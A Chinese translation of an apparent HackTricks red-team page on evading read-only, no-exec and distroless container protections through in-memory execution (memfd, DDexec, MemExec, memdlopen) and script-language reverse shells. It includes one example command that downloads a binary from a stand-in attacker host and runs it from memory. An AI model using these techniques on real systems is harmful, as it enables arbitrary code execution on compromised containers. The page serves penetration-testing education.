.. | ||
ddexec.md | ||
README.md |
绕过文件系统保护:只读 / 无执行 / Distroless
{% hint style="success" %}
学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE)
学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 关注 我们的 Twitter 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。
如果你对 黑客职业 感兴趣并想要攻克不可攻克的目标 - 我们正在招聘! (需要流利的波兰语书写和口语能力).
{% embed url="https://www.stmcyber.com/careers" %}
视频
在以下视频中,你可以找到本页提到的技术的更深入解释:
只读 / 无执行场景
在 Linux 机器上发现 只读 (ro) 文件系统保护 的情况越来越普遍,特别是在容器中。这是因为运行一个只读文件系统的容器就像在 securitycontext
中设置 readOnlyRootFilesystem: true
一样简单:
apiVersion: v1
kind: Pod
metadata:
name: alpine-pod
spec:
containers:
- name: alpine
image: alpine
securityContext:
readOnlyRootFilesystem: true
command: ["sh", "-c", "while true; do sleep 1000; done"]
然而,即使文件系统被挂载为只读,/dev/shm
仍然是可写的,因此我们不能写入磁盘的说法是错误的。然而,这个文件夹将被 挂载为无执行保护,所以如果你在这里下载一个二进制文件,你 将无法执行它。
{% hint style="warning" %}
从红队的角度来看,这使得 下载和执行 系统中不存在的二进制文件(如后门或枚举工具如 kubectl
)变得 复杂。
{% endhint %}
最简单的绕过:脚本
请注意,我提到的是二进制文件,只要解释器在机器内部,你可以 执行任何脚本,例如如果 sh
存在则可以执行 shell 脚本,或者如果安装了 python 则可以执行 python 脚本。
然而,这并不足以执行你的二进制后门或其他你可能需要运行的二进制工具。
内存绕过
如果你想执行一个二进制文件,但文件系统不允许这样做,最好的方法是 从内存中执行它,因为 保护措施不适用于内存。
FD + exec 系统调用绕过
如果你在机器内部有一些强大的脚本引擎,例如 Python、Perl 或 Ruby,你可以将二进制文件下载到内存中执行,将其存储在一个内存文件描述符中(create_memfd
系统调用),这个描述符不会受到这些保护的影响,然后调用 exec
系统调用 指定 fd 作为要执行的文件。
为此,你可以轻松使用项目 fileless-elf-exec。你可以传递一个二进制文件,它将生成一个指定语言的脚本,包含 压缩和 b64 编码的二进制文件 以及 解码和解压缩 的指令,存储在通过调用 create_memfd
系统调用创建的 fd 中,并调用 exec 系统调用来运行它。
{% hint style="warning" %}
这在其他脚本语言如 PHP 或 Node 中不起作用,因为它们没有任何 默认方式从脚本调用原始系统调用,因此无法调用 create_memfd
来创建 内存 fd 来存储二进制文件。
此外,使用 /dev/shm
中的文件创建 常规 fd 也不起作用,因为你将无法运行它,因为 无执行保护 将适用。
{% endhint %}
DDexec / EverythingExec
DDexec / EverythingExec 是一种技术,允许你 通过覆盖自己的进程的内存 来 修改内存。
因此,控制正在被进程执行的汇编代码,你可以编写 shellcode 并“变异”该进程以 执行任何任意代码。
{% hint style="success" %} DDexec / EverythingExec 将允许你加载并 执行 你自己的 shellcode 或 任何二进制文件 从 内存 中。 {% endhint %}
# Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
有关此技术的更多信息,请查看 Github 或:
{% content-ref url="ddexec.md" %} ddexec.md {% endcontent-ref %}
MemExec
Memexec 是 DDexec 的自然下一步。它是一个 DDexec shellcode demonised,因此每次您想要 运行不同的二进制文件 时,您无需重新启动 DDexec,只需通过 DDexec 技术运行 memexec shellcode,然后 与此守护进程通信以传递要加载和运行的新二进制文件。
您可以在 https://github.com/arget13/memexec/blob/main/a.php 找到如何使用 memexec 从 PHP 反向 shell 执行二进制文件 的示例。
Memdlopen
与 DDexec 具有类似目的的 memdlopen 技术允许以 更简单的方式加载二进制文件 到内存中以便稍后执行。它甚至可以允许加载带有依赖项的二进制文件。
Distroless Bypass
什么是 distroless
Distroless 容器仅包含 运行特定应用程序或服务所需的最低组件,例如库和运行时依赖项,但排除了较大的组件,如包管理器、shell 或系统实用程序。
Distroless 容器的目标是 通过消除不必要的组件来减少容器的攻击面,并最小化可以被利用的漏洞数量。
反向 Shell
在 distroless 容器中,您可能 甚至找不到 sh
或 bash
来获取常规 shell。您也不会找到 ls
、whoami
、id
等二进制文件……您通常在系统中运行的所有内容。
{% hint style="warning" %} 因此,您 将无法 获取 反向 shell 或 枚举 系统,如您通常所做的那样。 {% endhint %}
然而,如果被攻陷的容器正在运行例如 flask web,那么 python 已安装,因此您可以获取 Python 反向 shell。如果它正在运行 node,您可以获取 Node 反向 shell,几乎任何 脚本语言 都是如此。
{% hint style="success" %} 使用脚本语言,您可以 使用语言功能枚举系统。 {% endhint %}
如果没有 read-only/no-exec
保护,您可以利用您的反向 shell 在文件系统中写入您的二进制文件 并 执行 它们。
{% hint style="success" %} 然而,在这种类型的容器中,这些保护通常会存在,但您可以使用 之前的内存执行技术来绕过它们。 {% endhint %}
您可以在 https://github.com/carlospolop/DistrolessRCE 找到 示例,了解如何 利用一些 RCE 漏洞 获取脚本语言的 反向 shell 并从内存中执行二进制文件。
如果您对 黑客职业 感兴趣并想要攻克不可攻克的目标 - 我们正在招聘! (需要流利的波兰语书写和口语能力).
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 telegram 群组 或 在 Twitter 上关注 🐦 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。